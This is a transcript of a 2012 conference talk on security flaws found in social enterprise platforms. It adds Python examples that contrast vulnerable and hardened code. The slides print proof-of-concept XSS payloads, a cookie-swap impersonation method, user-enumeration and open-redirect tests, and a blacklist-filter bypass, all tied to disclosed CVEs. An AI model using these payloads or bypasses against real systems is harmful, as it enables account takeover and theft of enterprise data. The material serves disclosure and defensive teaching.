Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Transcript

  • 1. Social Enterprise Software Rises! …and so are the Risks
    Marian Ventuneac
    marian.ventuneac@gmail.com
    @mventuneac
  • 2. About myself
    - Security Architect
    - International presenter
    - Member of OWASP and ISACA global organizations
    - OWASP Ireland Limerick Chapter Leader: https://www.owasp.org/index.php/Ireland-Limerick
    - Security Researcher, PhD, MEng
    - http://www.ventuneac.net
    - http://secureappdev.blogspot.com
    - http://dcsl.ul.ie
    (slide footer) An Introduction to Web Application Security Risks
  • 3. Agenda
    - Social Enterprise Software: What, Why, and How?
    - Social Enterprise Software & Risks
    - Thoughts on Calculated Risk
    - Social Enterprise Software & Risks (some case studies)
    - Final Thoughts
  • 4. Social Enterprise Software: What?
    - Social Enterprise / Social Enterprise Networks / Social Enterprise Software
    - Enterprise solutions providing Facebook-like social networking functionality
    - 'social networking' + 'enterprise software' = 'social enterprise networking'
  • 5. Social Enterprise Software: Why?
    - Improve communication and increase work efficiency
      - internal collaboration
      - establish teams, communities or informal groups
      - share knowledge and learn from other people's experiences
      - social networking
      - external collaboration with partners
      - …
    - Used by employees and by external customers, suppliers and partners
  • 6. Social Enterprise Software: Deployment models
    - On-premise solutions: deployed inside the enterprise network, usually controlled and managed by the client
    - Public cloud-based solutions: Software as a Service (SaaS), hosted and administered by the vendor
    - Hybrid deployments
    - Usually open to allow external collaboration: customers, suppliers, third-party contractors, etc.
  • 7. Social Enterprise Software: Some of the Risks
    - Potential loss of enterprise data
      - Understand what type of data needs to be uploaded there
      - Do you know/control what data is actually being shared?
    - Exploitation of common application vulnerabilities
    - Phishing attacks, social engineering
    - Viruses and malware
    - Cloud-based solutions: various compliance and security concerns
      - Do you know where your data is stored?
  • 8. Common Strategies for Risk Mitigation
    - Vendor/supplier due diligence
    - Security policies (generic/dedicated)
    - Security processes & procedures
      - Control the data being shared (data classification)
      - Verify the identity of users accessing the data (authentication)
      - Control user access to data (authorisation)
      - Approve/create/lock user accounts (account management)
      - Remote wipe (for mobile devices: smartphones, tablets, etc.)
      - …
  • 9. Calculated Risks
  • 10. Calculated Risks (cont.)
    - Business requirement: WE (the company) need social enterprise software X for Y and Z reasons.
    - IT Security (most likely take on it):
      - Scenario 1: No, there is too much risk to take!
      - Scenario 2: Yes, we trust our partners and their choices.
      - Scenario 3: Yes, IF the Business ASSUMES ALL THE RISKS…
      - Scenario 4: Let's take a closer look at it…
      - Scenario 5: Yes, the vendor is big enough and we can trust it (= the vendor takes application security seriously)
  • 11. Let's Take a Closer Look
    - Software defects leading to exploitable security vulnerabilities
      - OWASP Top 10 Security Risks
      - CWE/SANS Top 25 Most Dangerous Programming Errors
    - Vendor size: a plus, but it doesn't guarantee that the chosen solution is vulnerability free
    - It is safe to assume that no application is 100% secure
    - If anyone claims such a thing, can they provide reasonable proof?
  • 12. Let's Take a Closer Look (cont.)
    - Trust but verify
      - Reach an agreement to test the chosen solution in a suitable environment (ideally prior to any contracts being signed)
      - Manual security testing
      - Automated security testing
      - Responsible disclosure
    - Most likely you will not be disappointed
  • 13. The Closer Look (cont.)
    - A practical take on assessing the security of social enterprise software solutions
    - Some of the chosen ones
  • 14. The Closer Look (cont.)
    - Assessment criteria including tests for
      - Cross-Site Scripting (XSS)
      - Insecure Direct Object Reference
      - Security Misconfiguration
      - Failure to Restrict URL Access
      - Unvalidated Redirects and Forwards
      - Logical Flaws
      - …
  • 15. Blogtronix Enterprise
    - Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS
    - CVE-2011-1039 - Multiple XSS Vulnerabilities
      - Persistent (partially) XSS via the Search functionality (authenticated user)
        HTTP request:
          http://test_site/Home/pages/search/?search=<script>alert(document.cookie)</script>&sub=1&tab=0
        HTTP response:
          …
          <a href="/Home/pages/search/?search=%3cscript%3ealert(document.cookie)%3b&amp;sub=1&amp;tab=0"><script>alert(docume...</a>
          </span>
          <span style="
          …
      - Note that the href is URL-encoded, but the link text echoes the raw search term into element content
  • 16. Blogtronix Enterprise (cont.)
    - CVE-2011-1039 - Multiple XSS Vulnerabilities
      - Reflected XSS in the login page via an arbitrary parameter
        HTTP request:
          https://test_site/pages/login/?a"><script>alert(document.cookie)</script>
        HTTP response:
          <form method="post" action="/pages/login/?a"><script>alert(document.cookie)</script>" id="aspnetForm">
        The raw query string is copied into the form's action attribute without encoding, so the quote closes the attribute and the script tag lands in the page
      - Multiple reflected XSS via existing and arbitrary parameters of existing resources
  • 17. Blogtronix Enterprise (cont.)
    - Insecure Direct Object Reference (variant)
      - A valid user A can potentially impersonate another user B
      - Tamper with the value of the userAccountID_http://test_site/ cookie (an ASP.NET GUID):
        1. At login time, replace the value of the userAccountID_ cookie with the one matching user B
        2. Do something noticeable (post a message in group X) and log out
        3. As authenticated user A, review user B's recent activity: user B appears as a recent visitor of group X
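The cookie swap above works because the application derives the acting identity from a value the client controls. The following example is added here and is not Blogtronix code; it contrasts that pattern with a server-side session lookup and with an HMAC-authenticated cookie. The account GUIDs, user names and function names are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed sample accounts: hypothetical GUIDs, not data from any real system.
USERS = {
    "5f8e0d2a-1b3c-4d5e-8f90-123456789abc": "userA",
    "0a1b2c3d-4e5f-4678-9abc-def012345678": "userB",
}

# --- Vulnerable pattern: identity is whatever GUID the client sends. ---
def who_am_i_vulnerable(cookies: Dict[str, str]) -> Optional[str]:
    """Reads the account id straight from the userAccountID cookie. Any client
    that knows (or guesses) another user's GUID is treated as that user."""
    return USERS.get(cookies.get("userAccountID", ""))

# --- Hardened pattern 1: identity lives server-side, keyed by a random session id. ---
SESSIONS: Dict[str, str] = {}   # session id -> account GUID (server memory or store)

def login(account_guid: str) -> Dict[str, str]:
    """Issue an opaque, unguessable session id; the GUID never leaves the server."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = account_guid
    return {"session": sid}

def who_am_i_hardened(cookies: Dict[str, str]) -> Optional[str]:
    guid = SESSIONS.get(cookies.get("session", ""))
    return USERS.get(guid) if guid else None

# --- Hardened pattern 2: if the id must travel in the cookie, authenticate it. ---
SERVER_KEY = secrets.token_bytes(32)   # generated at startup for this demo

def sign_identity(account_guid: str) -> str:
    tag = hmac.new(SERVER_KEY, account_guid.encode(), hashlib.sha256).hexdigest()
    return account_guid + "." + tag

def who_am_i_signed(cookies: Dict[str, str]) -> Optional[str]:
    value = cookies.get("userAccountID", "")
    if "." not in value:
        return None
    guid, tag = value.rsplit(".", 1)
    expected = hmac.new(SERVER_KEY, guid.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    return USERS.get(guid)

def demo() -> Dict[str, Optional[str]]:
    """Replays step 1 of the slide (user A presents user B's GUID) against all three designs."""
    guid_a, guid_b = list(USERS)
    results: Dict[str, Optional[str]] = {}
    results["vulnerable"] = who_am_i_vulnerable({"userAccountID": guid_b})
    # Session-backed: the cookie is opaque, so editing it just yields an unknown session.
    cookie = login(guid_a)
    sid = cookie["session"]
    cookie["session"] = sid[:-1] + ("A" if sid[-1] != "A" else "B")
    results["hardened_tampered"] = who_am_i_hardened(cookie)
    results["hardened_valid"] = who_am_i_hardened(login(guid_a))
    # Signed: swapping the GUID without the server key invalidates the tag.
    signed = sign_identity(guid_a)
    forged = guid_b + "." + signed.split(".", 1)[1]
    results["signed_forged"] = who_am_i_signed({"userAccountID": forged})
    results["signed_valid"] = who_am_i_signed({"userAccountID": signed})
    return results
```

The session-backed design is the usual choice: it also allows expiry and server-side revocation, and the session id should be rotated on login. The signed cookie still exposes a stable account identifier to the client, so it only prevents forgery, not enumeration.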
  • 18. Blogtronix Enterprise (cont.)
    - Security Misconfiguration
      - Enumerate valid user IDs: an unauthenticated attacker requests https://test_site/users/user_id
        - if user_id exists, the response is a redirect to the login page
        - if not, a custom error page is displayed
      - Enumerate valid groups: an unauthenticated attacker requests https://test_site/group_id/pages/people/
        - if group_id exists, the response is a redirect to the login page
        - if not, a custom error page is displayed
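The oracle on this slide exists because the existence check runs before the authentication check. The example below is added here (not Blogtronix code) and models both orderings as plain request handlers, plus the tester's view of them; the user and group ids are constructed.

```python
from typing import Callable, Dict, List, Set, Tuple

# Constructed sample data: hypothetical ids, not data from any real deployment.
KNOWN_USERS: Set[str] = {"1001", "1002"}
KNOWN_GROUPS: Set[str] = {"engineering", "sales"}

Response = Tuple[int, Dict[str, str]]
LOGIN_REDIRECT: Response = (302, {"Location": "/pages/login/"})
CUSTOM_ERROR: Response = (404, {"Content-Type": "text/html", "X-Page": "custom-error"})
OK: Response = (200, {"Content-Type": "text/html"})
Handler = Callable[[Set[str], str, bool], Response]

def resource_vulnerable(known: Set[str], resource_id: str, authenticated: bool) -> Response:
    """Existence is checked before authentication, so an anonymous request gets
    'redirect to login' for real ids and 'custom error' for fake ones: a free
    oracle for enumerating users or groups."""
    if resource_id not in known:
        return CUSTOM_ERROR
    if not authenticated:
        return LOGIN_REDIRECT
    return OK

def resource_hardened(known: Set[str], resource_id: str, authenticated: bool) -> Response:
    """Authentication gate first. Anonymous callers always receive the same
    response, and the lookup (with its timing) only happens for authenticated
    callers, who are entitled to know whether the object exists."""
    if not authenticated:
        return LOGIN_REDIRECT
    if resource_id not in known:
        return CUSTOM_ERROR
    return OK

def enumerate_anonymously(handler: Handler, known: Set[str], candidates: List[str]) -> List[str]:
    """Tester's view: compare each candidate against a known-bad id without
    logging in and keep those whose response differs from the baseline."""
    baseline = handler(known, "no-such-id-zzz", False)
    return [c for c in candidates if handler(known, c, False) != baseline]
```

The same gate applies to both URL patterns on the slide; the group handler is the same function with KNOWN_GROUPS. Comparing status code and headers is the minimum; a real probe should also compare body length and response time, since a database lookup that only runs for existing ids leaks through timing even when the visible response is identical.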
  • 19. Blogtronix Enterprise (cont.)
    - Improper Error Handling
  • 20. Blogtronix Enterprise (cont.)
    - CVE-2011-1040 - Unvalidated Redirects
      https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f
      - Once the user logs in, they are redirected to the resource given in the ReturnUrl parameter (here an external site), which makes the legitimate login page a phishing springboard
    - CVE-2011-1041 - Failure to restrict access to protected resources
      - An attacker who knows the hashed user ID and the name of an uploaded file can access the file without authentication
      - An attacker who knows the hashed user ID can access the user's profile picture without authentication
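The fix for the ReturnUrl issue is to validate the target before redirecting, not to trust the parameter. The example below is added here and is not Blogtronix code; it accepts only local paths on the same origin, or absolute https URLs whose host is on an exact-match allowlist (the partner host is hypothetical), and it handles the usual bypasses (protocol-relative URLs, backslash prefixes, userinfo tricks, control characters).

```python
from urllib.parse import urlsplit

DEFAULT_AFTER_LOGIN = "/"
# Hypothetical partner origin that may legitimately be a redirect target
# (hybrid / external-collaboration deployments). Exact host match only.
ALLOWED_EXTERNAL_HOSTS = {"partner.example"}

def is_local_path(value: str) -> bool:
    """A path on this origin: starts with a single '/', has no scheme or host,
    contains no control characters, and is not protocol-relative ('//host') or
    backslash-prefixed ('/\\host', which browsers normalise to '//host')."""
    if not value or not value.startswith("/"):
        return False
    if value.startswith(("//", "/\\")):
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return False
    parts = urlsplit(value)
    return not parts.scheme and not parts.netloc

def is_allowed_external(value: str) -> bool:
    """Absolute https URL whose hostname is exactly on the allowlist.
    Rejects 'https://partner.example@evil.example/' because the hostname
    component is evil.example, and rejects any embedded credentials."""
    try:
        parts = urlsplit(value)
    except ValueError:          # e.g. malformed IPv6 literal
        return False
    return (parts.scheme == "https"
            and parts.hostname is not None
            and parts.hostname.lower() in ALLOWED_EXTERNAL_HOSTS
            and parts.username is None and parts.password is None)

def post_login_target(return_url) -> str:
    """Where to send the browser after a successful login. return_url is the
    already-decoded ReturnUrl query parameter (framework decoding assumed);
    anything that fails validation falls back to the home page."""
    if isinstance(return_url, str) and (is_local_path(return_url) or is_allowed_external(return_url)):
        return return_url
    return DEFAULT_AFTER_LOGIN
```

Check the decoded value, never the raw percent-encoded one, and apply the check at the moment of redirect rather than when the parameter is first received, since the value may be stored and replayed.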
  • 21. Salesforce Chatter SaaS
    - Multiple persistent XSS vulnerabilities
      - via user profile first & last name
        <a href="/005D00000022Ouw" class="entityLink" title="Adam" onmouseover="alert(1)" Cole">Adam&quot; onmouseover=&quot;alert(1)&quot; Cole</a>
      - via group name
        <a href="/0F9D0000000PPwz" class="entityLink" title="test_group" onmouseover="alert(3)"">test_group&quot; onmouseover=&quot;alert(3)&quot;</a>
      - In both cases the link text is entity-encoded but the title attribute is not, so a double quote in the name closes the attribute and the rest of the name becomes an event-handler attribute
  • 22. Salesforce Chatter SaaS (cont.)
    - Improper User Input Validation
      - File Sharing: CR LF characters accepted into the file title (via the SaaS solution)
        POST /mobile/direct/23.0/005D0000001yD7B/feed_items.json HTTP/1.1
        Host: eu1.salesforce.com
        …
        Content-Disposition: form-data; name="title"

        arv_test52%0a%0d%0a
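Why a CR LF in a stored title matters depends on where the title is later written; the slide does not say, so the example below assumes one common sink, the Content-Disposition header sent when the file is downloaded. It is added here and is not Salesforce code. It shows the input-side check that should have rejected the title, the header injection that raw interpolation allows, and the output-side encoding that defuses it even if validation is bypassed. The title value is constructed from the slide's %0a%0d%0a observation with a hypothetical injected header appended.

```python
import re
from urllib.parse import quote, unquote

CONTROL_CHARS = re.compile(r"[\x00-\x1F\x7F]")

# Constructed: the slide's value plus a hypothetical attacker-appended header.
RAW_TITLE_FROM_FORM = "arv_test52%0a%0d%0aSet-Cookie:%20injected=1"
DECODED_TITLE = unquote(RAW_TITLE_FROM_FORM)   # 'arv_test52\n\r\nSet-Cookie: injected=1'

def title_is_valid(title: str) -> bool:
    """Input-side check for the POST that creates the file item: reject any
    control character (CR, LF, NUL, TAB, ESC, ...) instead of stripping a
    blacklist of them later. Length cap is an arbitrary demo value."""
    return bool(title) and not CONTROL_CHARS.search(title) and len(title) <= 255

def content_disposition_vulnerable(title: str) -> str:
    # Stored title echoed straight into a response header on download: the
    # CRLF ends the header and whatever follows is parsed as a new header.
    return 'Content-Disposition: attachment; filename="%s"' % title

def content_disposition_hardened(title: str) -> str:
    """Output-side defence: drop control characters, neutralise the quoted-
    string delimiters, and send a UTF-8 filename* parameter (RFC 5987) next to
    an ASCII fallback."""
    cleaned = CONTROL_CHARS.sub("", title).replace("\\", "_").replace('"', "_").strip() or "download"
    ascii_name = cleaned.encode("ascii", "replace").decode("ascii")
    return ('Content-Disposition: attachment; filename="%s"; filename*=UTF-8\'\'%s'
            % (ascii_name, quote(cleaned, safe="")))

def header_lines(header_block: str):
    """How an HTTP client splits a header block: on CRLF, bare LF or bare CR."""
    return [line for line in re.split(r"\r\n|\n|\r", header_block) if line]
```

The same two layers apply to any other sink for the title (logs, e-mail notifications, CSV exports): validate at the trust boundary, encode for the specific output context.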
  • 23. Salesforce Chatter Desktop
    - Improper Error Handling leading to Information Disclosure
      - submitting a comment for a nonexistent post
        HTTP POST request:
          /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1
        Error:
          {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149\nORA-06512: at "DOPEY.CFEEDCOMMENT", line 253\nORA-06512: at line 1\n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}
      - attempting to 'like' a nonexistent post
        HTTP POST request:
          /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1
        Error:
          {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDLIKE", line 156\nORA-06512: at "DOPEY.CFEEDLIKE", line 217\nORA-06512: at "DOPEY.CFEEDLIKE", line 118\nORA-06512: at line 1\n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}
      - The raw Oracle error, including schema, package names, line numbers and the stored procedure signature, is returned to the client
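The pattern behind both responses is a data-layer exception whose message is passed through to the API client unchanged. The example below is added here and is not Salesforce code; it shows an endpoint that does that next to one that translates driver errors into typed exceptions at the boundary, returns a generic message with a correlation reference, and keeps the detail in server-side logs. The post ids, schema name and error text are constructed to resemble the shape on the slide.

```python
import json
import logging
import uuid
from typing import Tuple

log = logging.getLogger("feed-api-demo")

class DataLayerError(Exception):
    """Mimics a database driver exception whose message carries backend detail."""

class NotFound(Exception):
    pass

# Constructed stand-ins: hypothetical feed items and an error message shaped
# like the leak on the slide (package and line numbers are made up).
POSTS = {"0D5D0000000abcd": {"body": "hello"}}
RAW_DB_MESSAGE = ('NoDataFoundException: ORA-20001: \nORA-06512: at "SCHEMA.CFEEDCOMMENT", '
                  'line 149\nORA-06512: at line 1')

def db_insert_comment(post_id: str, text: str) -> dict:
    """Stand-in for the stored-procedure call; raises like the driver would."""
    if post_id not in POSTS:
        raise DataLayerError(RAW_DB_MESSAGE)
    return {"post": post_id, "text": text}

def comments_endpoint_vulnerable(post_id: str, text: str) -> Tuple[int, str]:
    # Whatever the data layer says goes straight to the client.
    try:
        return 201, json.dumps(db_insert_comment(post_id, text))
    except DataLayerError as exc:
        return 404, json.dumps({"status": 404, "msg": str(exc)})

def insert_comment(post_id: str, text: str) -> dict:
    """Boundary between data layer and API: driver errors become typed
    exceptions; the driver text survives only as the chained cause, for logs."""
    try:
        return db_insert_comment(post_id, text)
    except DataLayerError as exc:
        if "NoDataFound" in str(exc):
            raise NotFound(post_id) from exc
        raise

def comments_endpoint_hardened(post_id: str, text: str) -> Tuple[int, str]:
    ref = uuid.uuid4().hex[:12]          # correlation id for support, carries no detail
    try:
        return 201, json.dumps(insert_comment(post_id, text))
    except NotFound:
        log.info("ref=%s comment on unknown post %s", ref, post_id)
        return 404, json.dumps({"status": 404, "msg": "Not found", "ref": ref})
    except Exception:                    # anything else: generic 500, full trace in logs only
        log.exception("ref=%s unhandled error", ref)
        return 500, json.dumps({"status": 500, "msg": "Internal error", "ref": ref})
```

The catch-all handler is what keeps a future, unexpected driver error from reopening the leak; the typed NotFound is what lets the client still get a correct 404.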
  • 24. Yammer
    - Persistent XSS via group name
      HTTP POST request:
        POST /ventuneac.net/groups HTTP/1.1
        Host: www.yammer.com
        …
        -----------------------------295562556131627
        Content-Disposition: form-data; name="group[name]"

        a4" onmouseover="alert(4)"
        -----------------------------295562556131627
      HTTP response (home page):
        GET /ventuneac.net/ HTTP/1.1
        Host: www.yammer.com
        …
        <a href="/ventuneac.net/groups/a4onmouseoveralert4" class="nav-list-link" title="a4" onmouseover="alert(4)" group">
  • 25. Jive
    - Persistent XSS via group name (create/edit)
      HTTP POST request:
        POST /create-group.jspa HTTP/1.1
        Host: ventuneac.jiveon.com
        …
        -----------------------------215202979014924
        Content-Disposition: form-data; name="description"

        group2"><script>alert(1)</script>
        -----------------------------215202979014924
      HTTP response (load group from Places):
        GET /groups/group2 HTTP/1.1
        Host: ventuneac.jiveon.com
        …
        <meta name="description" content="group2"><script>alert(1)</script>" />
  • 26. BroadVision Clearvale SaaS
    - Multiple persistent XSS vulnerabilities
      - via user profile first & last name, and the search page
        <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession(document.location(http://www.google.co.uk))">m&quot; style=&quot;xss:expr/*XS...</a>
      - via group name, and the search page
        <a href="http://vmarian.clearvale.com/pg/groups/23/aaaa-stylexssexprxssessiondocumentlocationhttpwwwgooglecouk/" title="aaa"><a style="xss:expr/*XSS*/ession(document.location(http://www.google.co.uk))">aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a>
      - The payload relies on CSS expression() in a style attribute (a legacy Internet Explorer feature); the /*XSS*/ comment splits the keyword so that a plain substring match for expression( does not fire
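The Salesforce, Yammer, Jive and Clearvale findings above, and the Blogtronix search and login findings earlier, share one root cause: user data is written into an HTML attribute or into element content without encoding for that context. The example below is added here and is not any vendor's code. It renders the same three sinks (link title attribute, meta content attribute, element content) in vulnerable and hardened form and audits the result with the standard-library HTML parser, which sees the markup the way a browser would. The payloads are constructed from the patterns on the slides; the href values and field names are hypothetical.

```python
import html
from html.parser import HTMLParser
from typing import List

# Constructed payloads modelled on the preceding slides (hypothetical profile,
# group and search values, not data from any vendor system).
PROFILE_NAME = 'Adam" onmouseover="alert(1)" Cole'
GROUP_DESC = 'group2"><script>alert(1)</script>'
SEARCH_TERM = "<script>alert(document.cookie)</script>"
CSS_NAME = 'm" style="xss:expression(document.location(\'http://www.google.co.uk\'))'

def profile_link_vulnerable(href: str, name: str) -> str:
    # Link text is entity-encoded (hence the &quot; visible on the slides) but
    # the title attribute is not: a double quote in the name closes the
    # attribute and the remainder becomes new attributes on the <a>.
    return '<a href="%s" class="entityLink" title="%s">%s</a>' % (href, name, html.escape(name))

def profile_link_hardened(href: str, name: str) -> str:
    # html.escape(quote=True) encodes & < > " and ', so the value can never
    # terminate a double- or single-quoted attribute or open a tag.
    return '<a href="%s" class="entityLink" title="%s">%s</a>' % (
        html.escape(href, quote=True), html.escape(name, quote=True), html.escape(name))

def meta_description_vulnerable(desc: str) -> str:
    return '<meta name="description" content="%s" />' % desc

def meta_description_hardened(desc: str) -> str:
    return '<meta name="description" content="%s" />' % html.escape(desc, quote=True)

def search_echo_vulnerable(term: str) -> str:
    return "<span>Results for %s</span>" % term          # element content, unencoded

def search_echo_hardened(term: str) -> str:
    return "<span>Results for %s</span>" % html.escape(term)

class _MarkupAudit(HTMLParser):
    """Records constructs that must never originate from user data: a script
    element, an on* event-handler attribute, or a style attribute containing
    expression(. The expression check is a plain substring match and is only a
    test oracle here, not a filter."""
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append("%s@%s" % (tag, name))
            if name == "style" and value and "expression(" in value.replace(" ", ""):
                self.findings.append("%s@style-expression" % tag)

def injected_markup(fragment: str) -> List[str]:
    """Parse a rendered fragment and return the dangerous constructs found."""
    auditor = _MarkupAudit()
    auditor.feed(fragment)
    auditor.close()
    return auditor.findings
```

Encoding is per context: html.escape(quote=True) is right for attribute values and element content, but a value placed inside a JavaScript string, a URL, or a CSS property needs that context's encoder instead, and a name that is allowed to appear in a style attribute at all should be rejected at input.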
  • 27. BroadVision Clearvale SaaS (cont.)
    - The broken fix for the user profile name XSS issue
      - Blacklist-based user input validation:
        - style followed by = becomes style00 (style=, style =, etc.)
        - document.location followed by ( becomes document.location00
        - alert followed by ( becomes 00
        - /* becomes /0* (first instance only)
        - */ becomes *0/
        - …
      - Improper output escaping (the title attribute is still written unencoded)
  • 28. BroadVision Clearvale SaaS (cont.)
    - The broken fix for the user profile name XSS issue
      - Bypassing the Clearvale XSS filter: the payload is split across the two name fields so that no single field contains a blacklisted token, and comments are used to break up the remaining keywords
        XSS payload:
          firstname: m" style
          lastname: ="/**/;xss:expr/**/ession(alert/**/(aaa))
        HTTP response:
          …
          <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/(aaa)) ">m&quot; style =&quot;/0**0/;xss:...</a>
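The two Clearvale slides above are a compact lesson in why blacklists fail. The example below is added here and is not Clearvale code: it reconstructs the filter from the rewrite rules listed on slide 27 (the exact regular expressions are an assumption; only the listed rewrites are modelled, applied to each form field separately), then shows that the naive payload is mangled, that the split payload from slide 28 passes through field by field and recombines into a new attribute, and that context-aware output encoding stops the breakout without any blacklist. The href and rel attributes are copied from the slide's markup; the helper names are hypothetical.

```python
import html
import re
from typing import List

def clearvale_style_filter(value: str) -> str:
    """Reconstruction of the blacklist described on slide 27 (an assumption
    about its implementation). Rewrites, in order: 'style=' -> 'style00',
    'document.location(' -> 'document.location00', 'alert(' -> '00',
    first '/*' -> '/0*', first '*/' -> '*0/'. Applied per form field."""
    value = re.sub(r"style\s*=", "style00", value)
    value = re.sub(r"document\.location\s*\(", "document.location00", value)
    value = re.sub(r"alert\s*\(", "00", value)
    value = value.replace("/*", "/0*", 1)
    value = value.replace("*/", "*0/", 1)
    return value

def render_profile_link_filtered(first: str, last: str) -> str:
    """The broken fix: blacklist on input, no encoding on output."""
    name = "%s %s" % (clearvale_style_filter(first), clearvale_style_filter(last))
    return '<a href="/pg/profile/3" rel="me" title="%s">%s</a>' % (name, html.escape(name))

def render_profile_link_encoded(first: str, last: str) -> str:
    """Context-aware output encoding: the attribute cannot be terminated."""
    name = "%s %s" % (first, last)
    return '<a href="/pg/profile/3" rel="me" title="%s">%s</a>' % (
        html.escape(name, quote=True), html.escape(name))

_ATTR = re.compile(r'\s([A-Za-z][\w-]*)\s*=\s*"[^"]*"')

def attribute_names(anchor_tag: str) -> List[str]:
    """Attribute names of the opening <a ...> tag, split the way a browser
    would split double-quoted attributes (the demo payloads contain no '>')."""
    opening = anchor_tag[: anchor_tag.index(">") + 1]
    return _ATTR.findall(opening)

# Slide 28's payload: 'style' and '=' live in different fields, 'alert' and
# '(' are separated by a comment, and only the first comment gets rewritten.
BYPASS_FIRST = 'm" style'
BYPASS_LAST = '="/**/;xss:expr/**/ession(alert/**/(aaa))'
# A naive single-field payload that the blacklist does catch.
NAIVE = 'm" style="xss:expression(alert(1))"'
```

The encoded version renders the same split payload with only href, rel and title attributes; the filtered version gains a style attribute exactly as the response on slide 28 shows. Filtering remains useful as defence in depth (and for rejecting names that contain quotes or angle brackets at all), but it is the output encoding that actually closes the hole.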
  • 29. Knowing What 'private' Really Means
    - Social Enterprise Software usually provides document sharing/publishing functionality
      - Private (not shared with anyone; the default option)
      - Shared with private (locked) groups/members
      - Shared with public groups
      - Shared with everyone (shared via a public link)
    - In certain conditions, private documents can become… less private
  • 30. AntiVirus & anti-malware file scanning
    - BroadVision Clearvale has a built-in AV scanning engine
    - The rest of the tested solutions currently lack such a capability
    - Yammer and Salesforce plan to add AV file scanning
    - No malicious files were used for testing AV capabilities
  • 31. The Closer Look: Summary
    - Common security vulnerabilities that can be easily exploited
    - User-shared information is not properly validated and sanitised
      - A malicious user can inject JavaScript malware into his/her profile, groups, actions, etc.
      - Where such user-controlled data is seen/accessed by other users, their accounts can easily be compromised
    - Exploitation of such vulnerabilities could severely compromise the security of enterprise data
  • 32. Final Thoughts
    - Even if the vendor is a market leader, it doesn't necessarily mean they get application security right
    - Dare to ask for proof of application security
    - Trust but verify
    - Vendor due diligence, social enterprise software related security policies & security procedures, etc.
    - Interested in this kind of benchmark? OWASP Security Baseline Project: https://www.owasp.org/index.php/OWASP_Security_Baseline_Project
  • 33. Thank You
    marian.ventuneac@gmail.com
    @mventuneac